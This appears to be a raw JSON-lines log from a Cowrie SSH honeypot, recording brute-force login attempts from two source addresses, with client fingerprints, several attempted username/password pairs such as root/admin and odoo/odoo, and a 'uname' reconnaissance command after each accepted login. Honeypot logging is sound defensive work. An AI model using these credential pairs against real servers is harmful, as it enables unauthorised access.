{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:21.135262Z","src_ip":"212.227.125.160","session":"b1a3108b7ff2"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:50:21.455803Z","src_ip":"212.227.125.160","session":"b1a3108b7ff2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:50:21.622551Z","src_ip":"212.227.125.160","session":"b1a3108b7ff2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:50:21.623352Z","src_ip":"212.227.125.160","session":"b1a3108b7ff2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:21.673644Z","src_ip":"212.227.125.160","session":"b1a3108b7ff2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:21.674742Z","src_ip":"212.227.125.160","session":"b1a3108b7ff2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43242,"dst_ip":"1.2.3.4","dst_port":22,"session":"230456e14c99","protocol":"ssh","message":"New connection: 212.227.125.160:43242 (1.2.3.4:22) [session: 230456e14c99]","sensor":"my-vps","timestamp":"2025-08-26T21:50:26.212045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:26.213011Z","src_ip":"212.227.125.160","session":"230456e14c99"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:26.271554Z","src_ip":"212.227.125.160","session":"230456e14c99"}
{"eventid":"cowrie.login.failed","username":"palworld","password":"palworld","message":"login attempt [palworld/palworld] failed","sensor":"my-vps","timestamp":"2025-08-26T21:50:26.454186Z","src_ip":"212.227.125.160","session":"230456e14c99"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:27.655298Z","src_ip":"212.227.125.160","session":"230456e14c99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38626,"dst_ip":"1.2.3.4","dst_port":22,"session":"46c5f6dfc7b1","protocol":"ssh","message":"New connection: 212.227.125.160:38626 (1.2.3.4:22) [session: 46c5f6dfc7b1]","sensor":"my-vps","timestamp":"2025-08-26T21:50:31.988348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:31.989601Z","src_ip":"212.227.125.160","session":"46c5f6dfc7b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:32.042534Z","src_ip":"212.227.125.160","session":"46c5f6dfc7b1"}
{"eventid":"cowrie.login.failed","username":"supermap","password":"supermap","message":"login attempt [supermap/supermap] failed","sensor":"my-vps","timestamp":"2025-08-26T21:50:32.241119Z","src_ip":"212.227.125.160","session":"46c5f6dfc7b1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:33.294015Z","src_ip":"212.227.125.160","session":"46c5f6dfc7b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34366,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3e53d761623","protocol":"ssh","message":"New connection: 212.227.235.229:34366 (1.2.3.4:22) [session: a3e53d761623]","sensor":"my-vps","timestamp":"2025-08-26T21:50:36.646554Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34012,"dst_ip":"1.2.3.4","dst_port":22,"session":"560c1d6085df","protocol":"ssh","message":"New connection: 212.227.125.160:34012 (1.2.3.4:22) [session: 560c1d6085df]","sensor":"my-vps","timestamp":"2025-08-26T21:50:36.973963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:36.975094Z","src_ip":"212.227.125.160","session":"560c1d6085df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:37.038178Z","src_ip":"212.227.125.160","session":"560c1d6085df"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:50:37.515020Z","src_ip":"212.227.125.160","session":"560c1d6085df"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:50:37.880080Z","src_ip":"212.227.125.160","session":"560c1d6085df"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:50:37.880765Z","src_ip":"212.227.125.160","session":"560c1d6085df"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:38.002372Z","src_ip":"212.227.235.229","session":"a3e53d761623"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:50:38.003376Z","src_ip":"212.227.235.229","session":"a3e53d761623"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:38.025826Z","src_ip":"212.227.125.160","session":"560c1d6085df"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:38.027000Z","src_ip":"212.227.125.160","session":"560c1d6085df"}
{"eventid":"cowrie.login.failed","username":"admin","password":"54321","message":"login attempt [admin/54321] failed","sensor":"my-vps","timestamp":"2025-08-26T21:50:42.690333Z","src_ip":"212.227.235.229","session":"a3e53d761623"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57634,"dst_ip":"1.2.3.4","dst_port":22,"session":"9355b33dea64","protocol":"ssh","message":"New connection: 212.227.125.160:57634 (1.2.3.4:22) [session: 9355b33dea64]","sensor":"my-vps","timestamp":"2025-08-26T21:50:43.077840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:43.088778Z","src_ip":"212.227.125.160","session":"9355b33dea64"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:43.128815Z","src_ip":"212.227.125.160","session":"9355b33dea64"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo","message":"login attempt [odoo/odoo] failed","sensor":"my-vps","timestamp":"2025-08-26T21:50:43.324198Z","src_ip":"212.227.125.160","session":"9355b33dea64"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:44.371447Z","src_ip":"212.227.125.160","session":"9355b33dea64"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:44.763469Z","src_ip":"212.227.235.229","session":"a3e53d761623"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53020,"dst_ip":"1.2.3.4","dst_port":22,"session":"f203dad41155","protocol":"ssh","message":"New connection: 212.227.125.160:53020 (1.2.3.4:22) [session: f203dad41155]","sensor":"my-vps","timestamp":"2025-08-26T21:50:48.415304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:48.416026Z","src_ip":"212.227.125.160","session":"f203dad41155"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:48.461604Z","src_ip":"212.227.125.160","session":"f203dad41155"}
{"eventid":"cowrie.login.failed","username":"almalinux","password":"almalinux","message":"login attempt [almalinux/almalinux] failed","sensor":"my-vps","timestamp":"2025-08-26T21:50:48.603397Z","src_ip":"212.227.125.160","session":"f203dad41155"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:49.775122Z","src_ip":"212.227.125.160","session":"f203dad41155"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48406,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b281b73db82","protocol":"ssh","message":"New connection: 212.227.125.160:48406 (1.2.3.4:22) [session: 5b281b73db82]","sensor":"my-vps","timestamp":"2025-08-26T21:50:54.128224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:54.129327Z","src_ip":"212.227.125.160","session":"5b281b73db82"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:54.178609Z","src_ip":"212.227.125.160","session":"5b281b73db82"}
{"eventid":"cowrie.login.failed","username":"dton","password":"dton","message":"login attempt [dton/dton] failed","sensor":"my-vps","timestamp":"2025-08-26T21:50:54.329428Z","src_ip":"212.227.125.160","session":"5b281b73db82"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:55.389822Z","src_ip":"212.227.125.160","session":"5b281b73db82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43792,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed3d896c573e","protocol":"ssh","message":"New connection: 212.227.125.160:43792 (1.2.3.4:22) [session: ed3d896c573e]","sensor":"my-vps","timestamp":"2025-08-26T21:50:59.602981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:59.619011Z","src_ip":"212.227.125.160","session":"ed3d896c573e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:59.681344Z","src_ip":"212.227.125.160","session":"ed3d896c573e"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:51:00.366956Z","src_ip":"212.227.125.160","session":"ed3d896c573e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:51:00.546460Z","src_ip":"212.227.125.160","session":"ed3d896c573e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:51:00.547185Z","src_ip":"212.227.125.160","session":"ed3d896c573e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:00.599525Z","src_ip":"212.227.125.160","session":"ed3d896c573e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:00.600677Z","src_ip":"212.227.125.160","session":"ed3d896c573e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39180,"dst_ip":"1.2.3.4","dst_port":22,"session":"97a65f2ddb7a","protocol":"ssh","message":"New connection: 212.227.125.160:39180 (1.2.3.4:22) [session: 97a65f2ddb7a]","sensor":"my-vps","timestamp":"2025-08-26T21:51:05.351051Z"}
